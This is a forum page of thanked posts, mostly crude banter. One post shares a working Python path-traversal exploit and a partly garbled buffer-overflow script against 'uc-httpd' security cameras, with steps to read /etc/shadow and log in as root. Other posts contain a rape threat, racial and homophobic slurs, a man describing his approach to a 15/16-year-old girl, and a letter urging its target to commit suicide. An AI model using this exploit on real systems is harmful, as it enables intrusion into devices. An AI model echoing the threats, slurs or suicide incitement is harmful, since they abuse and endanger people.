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Posts That Were Thanked by Sudo

  1. Kev Space Nigga
    so today wasnt too bad like i anticipated, im back to normal, i guess the serotonin/dopamine dip has left the building.

    i appreciate everyone who tried to help, especially ratboy who doesnt have to do much to make me grateful to be alive
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Damn bro that made me leak precum all over the place 11/10 gj hell yeah brother
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  3. Originally posted by Sudo I used to have toothless Joe's PI. I remember his name was way gayer than "Joe" and he lived in a place in Britain I'd never heard of but seemed quite populous. Remember Nerd Fangs? He was an alright British Bloke as well.

    RIP Fubi

    Get help Oct

    Unban me Meta

    Teach me how to fingerblast Jackketch

    I remember when Meta banned me on totse for posting this picture of him

    lmao, those were the days.
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. The following users say it would be alright if the author of this post didn't die in a fire!
  5. STER0S Space Nigga [the disappointingly unanticipated slab]
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. lockedin Tuskegee Airman
    The author of this post has returned to nothingness
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. lockedin Tuskegee Airman
    The author of this post has returned to nothingness
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. mmG African Astronaut
    Wariat I am calling you out. Meet me any time, any place and I will rape you and post videos of your nonconsensual sexual violation.
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. STER0S Space Nigga [the disappointingly unanticipated slab]
    u shouldve been liek:

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  10. MLT Yung Blood
    So, here is an n-day expoit that we (my 0day development crew) found back in 2017 (zero-day at the time). Reposting from my github. It's still unpatched despite being four years old, with over two million vulnerable IoT devices (with remote root possible on all of them).
    The affected software is "uc-httpd" which is a web interface for a series of models of security cams. Due to the nature of this vuln, it's not possible for them to patch it without performing a mass product recall and re-writing the firmware, so currently it's still exploitable as an n-day :)
    Do not abuse this. This is only for research, nothing else. I can't be held liable for your stupidity.

    There are multiple exploits here. There is a local file disclosure and also a buffer overflow - you can generally get root via the LFD alone, so there's not really much need for the buffer overflow unless an LFD scenario fails.

    So, the LFD is sent as a direct HTTP request to the box, rather than being a vuln POST/GET param. You can generally read /etc/shadow file on the box via the LFD, which contains PLAINTEXT hashes for the root password (so you can just SSH into teh box as root from there using the plaintext pass).
    If for some reason you can't read the shadow file via the LFD, then instead you should attempt to read /mnt/mtd/Config/Account1 to get credentials from the admin interface, and then you can abuse the overflow from there to get root.

    Here you can see the results from shodan, showing that there are currently more than 1.9 million devices running this (with our more extensive scanning returning over 2.5million devices):

    LFD automated exploit code (python):

    #!/usr/bin/env python
    import urllib2, httplib, sys

    httplib.HTTPConnection._http_vsn = 10
    httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'

    print "[+] uc-httpd 0day exploiter [+]"
    print "[+] usage: python " + __file__ + " http://<target_ip>"

    host = sys.argv[1]
    fd = raw_input('[+] File or Directory: ')

    print "Exploiting....."
    print '\n'
    print urllib2.urlopen(host + '/../../../../..' + fd).read()

    It is also worth noting, that in addition to the LFD vuln... you can also supply a directory path to uc-httpd in the same manner that you'd supply the file you want to disclose... it will then output the contents of the directory to you as if you ran "ls" on that dir, so you can use that to enumerate directory contents in order to read even more files (although generally all you need to read to pop root is /etc/shadow or /mnt/mtd/Config/Account1)

    If you can't read shadow file and ssh direct into the box as root that way, then read Account1 file and use the following buffer overflow within the web interface (protip: if ASLR is enabled, you can get the relevant memory regions via reading particular proc entries through the LFD)

    Buffer Overflow automated exploit code (python):

    import mechanize, time, sys, urllib, socket

    from termcolor import colored

    print colored('uc-httpd web-daemon bufferoverflow', 'red')
    print colored('- Overwrites the stack (attach to see)', 'red')
    print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')

    def at_login_overflow():
    print colored('Sending payload.. ', 'red')
    s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id
    x = mechanize.Browser()
    x.addheaders = [("User-agent",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]

    login = + s_c)

    x["username"] = buffersm
    x["password"] = "mikevirushackinglimited"

    except Exception:
    print colored('Target daemon not vulnerable.', 'red')


    # Check interface status
    def check_conn():
    print colored('Checking interface status..', 'red')

    print colored('Exploit failed', 'red')
    except Exception:
    print colored('Finished.', 'red')

    tar = sys.argv[1]
    tar_p = sys.argv[2]
    buff_size = sys.argv[3]

    tar_full = "http://" + tar + ":" + tar_p

    # rec 180
    buffersm = "\x41" * int(buff_size)

    # post only

    Overwrite set shellcode:


    enjoy ;) but please don't abuse.
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  11. Days doing absolutely nothing are such a luxury.
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. Nile bump
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  13. rabbitweed African Astronaut
    Originally posted by Wariat I remember about two yrs ago before covid I was on my step skooter or hulajnoga walking with it and sitting down at nad wisle in Warsaw where those cement benches are and the river is there. Some teenage polish girl kept making eye contact and turning her head at me (maybe even smiled) and I smiled at her. I walked by she looked at me (I dont know if this indeciseveness or me not having the balls to do or say anything right there and then did it) and later I turned around and as I was passing by her and her two female friends were not looking at me and I came up from behind her and tried to give her my business card I had at the time (self made but it had my number on it) and said if you ever wanna talk or anything hit me up and those two other teenage bitches were cock blocking saying "she doesnt want to" or some shit. and it just failed.

    It was weird because she wouldnt even turn to look at me but earlier she was all gigddy turning around at me every few seconds. Teenage girls are hard to get and make no sense guys or maybe the Polak variety. I mean was it the indeciveness not going for it right away as she looked and smiled that did it or why were her friends such bitches?

    She must have been around 15/16 but it didnt matter it wasnt as like I was trying to fuk her then and there. I was just trying to get to know her as a person.

    Quoted before he deletes it.
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  14. Speedy Parker Black Hole
    Originally posted by mmG In terms of comedy.

    Dropped bomb huh?
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  15. You know you're an alcoholic when:

    1. You shit the bed.
    2. You start drinking before 10am.
    3. Your garage or basement is packed to the ceiling with empty liquor and beer bottles.
    4. You've killed two or more persons (consecutively), while driving under the influence.
    5. You always argue with the bartender at last call.
    6. You don't bother to use glasses or cups anymore.
    7. Your skin is turning a motley greyish color.
    8. You don't recognize yourself in the mirror.
    9. You get discount fliers from various liquor stores in the mail.
    10. Your sense of hearing has been reduced down to 10-15%.
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. aldra JIDF Controlled Opposition
    can you stop posting your child molestation fantasies please
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  17. Originally posted by the man who put it in my hood

    Irish space program ☘️
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  18. mmQ Lisa Turtle
    Originally posted by DrugSmuggler A-men?

    Chewy Flintstone Invite-a-men
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  19. mmG African Astronaut

    There's a place beyond this mortal realm, a place I have seen in my mind where no reality can compare and I find myself a broken machine in a world where pleasure or happiness has ceased to affect my brain in any normal fashion because I feel myself already as a being of electric starlight who surfs under distant suns on the winds of alien atmospheres and every good experience I have in this life now feels dead and boring and faggoty. I just don't care any more. Literally who gives a fuck. I have been writing a book about entropy and I kept thinking about the end of the universe, even past heat death, when dark energy has accelerated cosmic expansion to such a degree that the cosmological event horizon of one half of a proton will be cut off from the other, and then even smaller until at least the Planck scale. There will only be one thing that can ever extract positive energy out of Dark Energy and perhaps use it to start a whole new universe: the physical, quantum chromodynamic phenomenon known as color confinement. In essence quarks can only exist in pairs. If you try to tear them apart, the energy needed to do is coincidentally exactly as much energy to create a new quark (pair) out of each new quark pair, you can never distinguish which of the two quarks in the pair was one of the quarks in the original pair and which was the newly formed one due to color confinement. For this reason quarks literally cannot exist alone, they can only exist as pairs and there can be no lone quark. Long story short if dark energy gets to the point of tearing apart quark pairs, essentially it will start mass generating lots of new quark pairs by tearing apart the old ones, which will become kernels for new universes when they generate enough mass quickly enough to to resist the pull of dark energy. The reason I believe this is because I started considering what would happen when the receding cosmological event horizon closing in on every point, expanding every point from each other at that point faster than light, met the event horizon of the black hole, itself pulling in spacetime faster than light. The resultant tug of war will create a stable region before the black hole is evaporated away by the expansion and Hawking radiation.

    Anyway sike nigga you thought
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  20. mmG African Astronaut
    In view of your low grade... I will not dignify your name with either a Mr. or a Reverend or a Dr. And, your username name calls to mind only the type of products such as low quality concrete and mixy lemonades...

    QMR, look into your heart. You know you are a complete fraud and a great liability to all Uber drivers. Rideshare customers in this country have enough frauds of their own but I am sure they don't have one at this time anywhere near your equal. You are no clergyman and you know it. I repeat you are a colossal fraud and an evil, vicious one at that. You could not believe in God... Clearly you don't believe in any personal moral principles.

    QMR, like all frauds your end is approaching. You could have been our greatest driver. You, even at an early age have turned out to be not a leader but a dissolute, abnormal moral imbecile. We will now have to depend on our older leaders like Aquino, a man of character and thank God we have others like him. But you are done. Your "honorary" degrees, your 4.9 star rating (what a grim farce) and other awards will not save you. QMR, I repeat you are done.

    No person can overcome facts, not even a fraud like yourself. Lend your sexually psychotic ear to the enclosure. You will find yourself and all your dirt, filth, evil, and moronic talk exposed on the record for all time. I repeat — no person can argue successfully against facts. You are finished. You will on the record for all time your filthy, dirty, evil companions, male and females giving expression to you with your Gospel hideous abnormalities. And some of them to pretend to be ministers of the Gospel. Satan could not do more. What incredible evilness. It is all there on the record, your sexual orgies. Listen to yourself you filthy, abnormal animal. You are on the record. You have been on the record - all your adulterous acts, your sexual orgies extending far into the past. This one is but a tiny sample. You will understand this. Yes, from your various evil playmates on the east coast to whores and others on the west coast and outside the country you are on the record. QMR you are done.

    The American public, the church organizations that have been helping — Protestant, Catholic and jedis will know you for what you are — an evil, abnormal beast. So will others who have backed you. You are done.

    QMR, there is only one thing left for you to do. You know what it is. You have just 34 days in which to do it (this exact number has been selected for a specific reason, it has definite practical significance). You are done. There is but one way out for you: suicide. You better take it before your filthy, abnormal fraudulent self is bared to the nation.
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